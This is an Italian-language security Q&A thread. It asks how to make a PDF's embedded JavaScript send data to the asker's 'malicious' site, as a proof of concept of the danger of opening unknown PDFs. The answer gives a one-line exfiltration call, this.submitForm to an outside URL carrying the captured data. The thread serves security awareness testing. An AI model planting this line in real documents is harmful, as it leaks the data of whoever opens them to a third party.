Invia richiesta GET da un file PDF

1

Attualmente sto lavorando a una prova di sicurezza di cui ho bisogno per mostrare il pericolo di aprire un file PDF sconosciuto. Internet dice che molti malware utilizzano JavaScript nel documento PDF (AcroJS) per scaricare il loro carico utile malevolo.

My PoC è basato su una vittima che dimostrerà la perdita di dati in base all'apertura di un file PDF. Ho solo bisogno di inviare il nome del file su Internet (per iniziare).
Posso scrivere codice Javascript che viene avviato all'apertura del documento ma la funzione Net.HTTP.request può essere utilizzata solo nel contesto attendibile.
Quindi non vedo come fare una richiesta GET al mio sito web "malvagio" in ascolto. Ho letto che a volte gli hacker utilizzano le vulnerabilità in Acrobat per fare il loro male, ma in molti luoghi si parla della capacità nativa di AcroJS di consentire la richiesta GET.

Qualcuno sa come fare una richiesta GET a senso unico (la risposta del server non è nemmeno interessante in questo caso).

Forse c'è un modo per includere un'immagine remota (non esistente) in modo che il PDF faccia una richiesta GET all'URL specificato. O qualcosa del genere.

Grazie

    
posta Sibwara 15.11.2018 - 00:32
fonte

1 risposta

0

Ok, trovo un modo usando:

this.submitForm("http://mydomain.fr/var="+thedataIwant);

All'utente viene richiesto un tentativo provvisorio di connessione HTTP, ma questa è la vigilanza che voglio testare.
Gli articoli di questo ragazzo mi aiutano molto: link

    
risposta data 15.11.2018 - 18:14
fonte

Leggi altre domande sui tag